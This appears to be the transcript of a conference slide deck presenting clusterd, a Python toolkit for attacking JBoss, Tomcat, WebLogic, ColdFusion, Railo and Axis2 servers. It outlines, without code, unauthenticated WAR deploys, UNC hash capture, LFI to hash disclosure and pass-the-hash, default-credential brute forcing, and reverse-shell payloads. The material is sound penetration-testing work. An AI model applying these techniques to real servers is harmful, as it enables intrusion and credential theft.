330 likes | 343 Views
A Python-based, command line-driven toolkit for attacking JBoss, Tomcat, WebLogic, ColdFusion, Railo, Axis2 servers. Discover vulnerabilities, exploit LFI, brute force, and more.
E N D
clusterd: app server security Bryan Alexander
who • pentester @ Coalfire Labs • Independent researcher • Breaking via building
why? • ColdFusion 10 deployments? • JRun hash retrieval? • WebLogic anythings? • Running versions? • Jboss 7.x/8.x deploys? • Brute forcing? • Railo? Axis2? WebSphere?! • More!?
what • clusterd; application server attack toolkit • Python-based, command line driven • Support for Jboss, WebLogic, Tomcat, Coldfusion, Railo, …
what • JBoss • Tomcat • WebLogic • ColdFusion • Railo • Axis2
JBoss • So much has already been said (Matasano, Red Team Pentesting, HSC) • Let's talk about things that haven't been
Jboss Recap • Versions 3.x – 7.x “Jboss” • Versions 8.x+ rebranded to “WildFly” • Make it rain shells with WARs • No security by default • clusterd currently features 7 unique deployers • Typically run as an administrative/SYSTEM user
Jboss 7.x • One interface to rule them all (JSON API) • They still haven't figured out how authentication works • Unauthenticated deploys via exposed management interface
Jboss UNC • Not a new attack, but a new application • Force JBoss to load a remote resource via a UNC path, capture hashes, crack 'em
Jboss CVE-2005-2006 • Nobody is using this bug to fetch credentials
Jboss Auxiliary • Auxiliary modules used for scraping remote information
Tomcat Recap • Tomcat 3.x – 8.x; very consistent platform • Default creds! • Roles! manager vs. manager-gui • clusterd currently deploys to everything
Tomcat • Not much going on; all the standard modules
WebLogic • Oracle's very own Jboss/Tomcat (still Java) • Very enterprise-y; clustering, systematic backups, etc • Difficult to obtain older versions (which have default creds)
WebLogic • WebLogic supports deploying WAR files, and so does clusterd • You have to use the java/jsp_shell_*_tcp payloads (default in clusterd)
WebLogic • Two versions of the admin interface; http and https (ports 7001 and 9002) • Typically run as a system service • Clustered environment, deploys can trickle down a domain • Very often seen in high-availability environments, ie. systems running active/active
Coldfusion Recap • Coldfusion 6.x – 11.x • clusterd currently has three deployers for CF • LFI leading to hash disclosure v6.x – 10.x • No cracking when you can PTH • No default credentials, but plenty of ways to get around that
Coldfusion • Everybody knows the task scheduler can be used to deploy • 10.x+ restricts the extension (no cfml)
Coldfusion • How about LFI to RCE?
Railo • Railo 3.x – 4.x • Essentially just a FOSS Coldfusion • Task scheduler, plugin architecture, clustered servers, lots of development • By default very promiscuous
Railo • No public vulnerabilities, yet... • Two interfaces; server.cfm and web.cfm • Runs jsp and cfml, much like CF
Axis2 • Axis2 1.2 – 1.6 • Web services (soap/wsdl) engine; deploy services not applications • Couple ways to deploy; clusterd currently supports one (recently added) • Default creds! • Last release was 2012, but still heavily used
Axis2 • Generating payloads is pretty simple, but we can't use vanilla msfpayload • Generate a java/meterpreter/reverse_tcp and pack it into a jar; build XML descriptor
Axis2 • LFI in 1.4.x, obviously we're going to fetch creds
other features • All platforms support brute forcing via supplied wordlist
other features • Clean up after yourselves; every platform has an undeployer
other features • Discovery module
other features Maybe demo?
FOSSy • Well formed pull requests welcome • https://github.com/hatRiot/clusterd • Public to-do hosted on Trello • https://trello.com/b/Bwcmrsyd/clusterd • Research and 0days and fun stuff on my blog • http://hatriot.github.io/ • Twat or email me your questions/bugs/requests • @dronesec (bryan.alexander@coalfire.com)
Questions¿ Comments?